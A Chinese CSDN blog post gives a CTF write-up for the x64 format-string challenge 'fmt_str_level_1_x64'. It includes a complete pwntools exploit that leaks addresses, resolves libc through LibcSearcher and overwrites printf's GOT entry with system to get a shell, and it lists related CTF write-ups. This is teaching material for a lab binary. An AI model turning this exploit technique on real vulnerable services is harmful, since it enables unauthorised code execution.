Pwn 学习 fmt_str_level_1_x64 格式化字符串

最新推荐文章于 2024-08-18 09:13:53 发布
最新推荐文章于 2024-08-18 09:13:53 发布
阅读量399 收藏 1
点赞数
分类专栏: Pwn 文章标签: 学习 linux 运维 ctf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/126796021
版权
本文详细介绍了如何在x64架构下利用格式化字符串漏洞,通过fmtstr_payload函数构造payload,寻找main函数的真实地址,篡改puts函数的 GOT 条目,获取puts函数的地址,进而找到libc基地址,最终实现system调用。过程中涉及字节对齐问题及pwntools库的使用。
摘要由CSDN通过智能技术生成

Pwn 学习 fmt_str_level_1_x64 格式化字符串

1.checksec

在这里插入图片描述

2.格式化字符串利用思路

思路同上篇

3.区别

  • x64需要考虑到字节对齐的问题

pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)
第一个参数表示格式化字符串的偏移;
第二个参数表示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修改的值}
第三个参数表示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload
payload = fmtstr payload (offset, { addressl:valuel} )

3.exp

from pwn import *
from LibcSearcher import *
# log_level='debug', 

context(log_level='debug', arch='amd64', os='linux')

pwnfile = './fmt_str_level_1_x64'

elf = ELF(pwnfile)

#libc = elf.libc

io = process(pwnfile)

payload_search_main = b'%41$p\n'

io.recvuntil('input:\n')

# gdb.attach(io)

io.send(payload_search_main)

main_24 = int(io.recv()[2:14], 16)

main_real_addr = main_24 - 24

print('main_real_addr is ', hex(main_real_addr))

offset = (elf.symbols['main'] - elf.got['puts'])

puts_got = main_real_addr - offset

print('puts_got_addr is ',hex(puts_got))

payload_search_bass = flat([b'%7$saaaa', p64(puts_got)])

gdb.attach(io)

io.sendline(payload_search_bass)

puts_real_addr = u64(io.recv(6).ljust(8, b'\x00'))

#puts_real_addr = u32(io.recv(6).ljust(8, b"\x00"))

print('puts_real_addr is ', hex(puts_real_addr))

libc = LibcSearcher('puts', puts_real_addr)

libc_base_addr = puts_real_addr - libc.dump('puts')

print('libc_base_addr is ', hex(libc_base_addr))

sys_addr = libc_base_addr + libc.dump('system')

print('sys_addr is ', hex(sys_addr))

addr_bin_sh = libc_base_addr + libc.dump('str_bin_sh')

print('addr_bin_sh is ', hex(addr_bin_sh))



offset_addr_of_printf = elf.symbols['main'] - elf.got['printf']

printf_real_got_addr = main_real_addr - offset_addr_of_printf

print('printf_real_got_addr is:', hex(printf_real_got_addr))

payload_pwntools_create_set_stack = fmtstr_payload(6, {printf_real_got_addr : sys_addr})

io.recvuntil('input:\n')

io.send(payload_pwntools_create_set_stack)

io.interactive()
==Microsoft==
关注
专栏目录
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1858
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
pwn——x64下的格式化字符串
qq_41560595的博客
02-16 577
x64和x86在格式化字符串传参上稍有不同,原因在于x64会把printf函数中的参数先传到6个寄存器中。下面以一道例题说明。 链接:https://pan.baidu.com/s/1fgg6HRr__08fW1P0HgmaKA 提取码:1111 二进制文件拖入IDA并F5 代码吧啦吧啦一大堆,实际上就是让你猜一个flag和真正的flag比对,比对正确会给你flag。= =我要是都知道flag还要你的flag干嘛?! gdb调试 断点断在_isoc99_scanf处,输入AAAA。调试到printf时,查
fmt格式化字符串漏洞总结
最新发布
2302_79542511的博客
08-18 983
本文章适合写题时帮助快速回忆,不适合初学者。
pwnable(echo2)【64位格式化字符串&uaf】
九层台
01-26 751
和echo1差不多都没开启任何保护,有一个格式化字符串漏洞 64位格式化字符串和32位有些不同64位寄存器是靠寄存器来传参的(说白了格式化字符串就是打印参数的值,或者向参数位置指向的地址处写入数据) 64位寄存器传参的顺序: rdi, rsi, rdx, rcx, r8, r9 这是执行printf时候的状态。 这个是输出的数据 0x1cd605f,0x7f81ace85790,0x70252...
64位格式化字符串漏洞pwn入门
z2876563的博客
08-10 1937
CTF竞赛权威指南PWN篇第166页参考程序 如下程序有格式化字符串漏洞,原文是编译成32位程序,为了增加难度,我编译成64位程序。以下我通过漏洞实现输入arg4的地址获取arg4的内容即ABCD。 //fmtdemo.c -o #include<stdio.h> void main() { char format[128]; int arg1 =1,arg2=0x88888882,arg3=-1; char arg4[10]="ABCD"; scanf("%s
buu_64位fmPWN——axb_2019_fmt64(64位格式化字符串改got表)不使用fmstr工具包
ngztx的博客
03-22 636
如果这样写,前面的地址数据经p64()打包后占的是8个字节,我们send 的地址和我们构造的格式化字符串中间还有好多个 ‘00’ ,而在字符串中 ‘00’ 就代表了结束,所以在printf到‘00’时,就被认为字符串已经结束了,自然不会继续往后面printf了,也即是说我们的字符串都被’00’给截断了。到这里为止,应该对%k$n有一定的了解了,还是那个原则,%k$n前面有多少个字节,那么就会向第k个参数地址中写多少。只有后面3字节不同,截取倒数第三字节和后两字节进行修改。难点3:分别计算高地址和低地址。
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2960
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
printf 格式化 输出_64位格式化字符串漏洞修改got表利用详解
weixin_39631295的博客
11-27 1389
前言格式化字符串漏洞是最基础也是很老的一个漏洞了,网上一搜索就会有一堆的解释、原理、以及利用,但全都是对32位的格式化漏洞的解析,64位的几乎没有,就算有也被一笔带过。但是当你利用格式化漏洞来修改64位elf的got表时,你会发现并没有详细的那么简单,虽然和32位的原理一样,但payload的构建方法却有所差别。甚至难度也大大增加故此有了此处尝试以及尝试后的一些总结漏洞分析程序源码:#...
格式化字符串
m0_49959202的博客
10-29 814
文章目录格式化字符串1.原理1.1 格式化字符串介绍1.1.1 格式化字符串函数1.1.2 格式化字符串1.1.3 参数1.2 32位格式化字符串漏洞基本原理1.3 32位格式化字符串利用思路1.3.1 利用1:程序崩溃1.3.2 利用2:泄露内存1.3.2.1 泄露栈内存1.3.2.1.1 获取栈变量数值1.3.2.1.2 获取栈变量对应字符串1.3.2.2 泄露任意地址内存1.3.3 利用3:覆盖内存1.3.3.1 覆盖栈内存1.3.3.2 覆盖任意地址内存1.3.3.2.1 覆盖为小数字1.3.3.3
【逆向学习记录】格式化字符串漏洞原理及其利用
卦星的专栏
02-12 1258
1.概述 前面学习完成栈溢出的漏洞利用,接下来最长用到的就是格式化字符串了,由于懒散,春节之前耽误的很多时间,这里统一整理一下 学习的过程中,主要参考文章: 格式化字符串利用小结 CTF WIKI 格式化字符串漏洞利用 2.关键知识点 引用参考文件的内容 %c:输出字符,配上%n可用于向指定地址写数据。 %d:输出十进制整数,配上%n可用于向指定地址写数据。 %x:输出16进制数据,如%i$x表示...
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 932
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1581
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
好好说话之64位格式化字符串漏洞
hollk’s blog
08-06 3061
64位格式化字符串和32位的很相似,做题的步骤也相同,唯一不同的是64位程序对函数参数存储的方式和32位的不同。64为程序会优先将函数的前6个参数放置在寄存器中,超过6个的再存放在栈上,而32位直接存放在栈上。寄存器存放顺序可以看我之前写的好好说话之ret2csu 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 例题选自2017-UIUCTF-pwn200-GoodLuck checksec搞一下 64位程序,开启了NX保护、Canary。因为我们知道这是一道格式化字符串的题
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2690
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got表内容修改为0x400982,这样,我们就能一直处于...
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6677
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
mcmuyanga的博客
01-27 2819
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
格式化字符串利用小结
Juny0117的博客
11-27 281
格式化字符串漏洞基本原理: Printf()函数的一般形式为printf(“format”,输出表列),其第一个参数就是格式化字符串,用来告诉程序以什么格式进行输出。正常情况下,这样使用: char str[100]; scanf(“%s”,str); printf(“%s”,str); 但也有人这么用: char str[100] scanf(“%s”,str); ...
pwntools中fmtstr的使用
fa1c4的blog
02-01 4304
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
Fmtstr_Loop
钞sir的博客
06-23 9798
前言 很多时候都是因为程序中存在循环,如果程序中不存在循环呢?在一些栈溢出中我们可以使用ROP技术劫持函数返回地址到start,同样我们可以使用格式化字符串漏洞做到这一点… 实例 题目:12届信息安全国赛半决赛西南赛区 思路 虽然我们写代码的时候以main函数作为程序入口,但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_m...
ciscn_2019_pwn挑战赛:破解五道经典题目解析
它可能涉及更复杂的漏洞,比如格式化字符串漏洞、堆漏洞或者更高级的栈溢出利用。在解决bms时,参赛者需要对内存管理和程序的数据结构有较为深入的了解,包括但不限于堆管理机制、堆块的分配与释放、以及如何利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值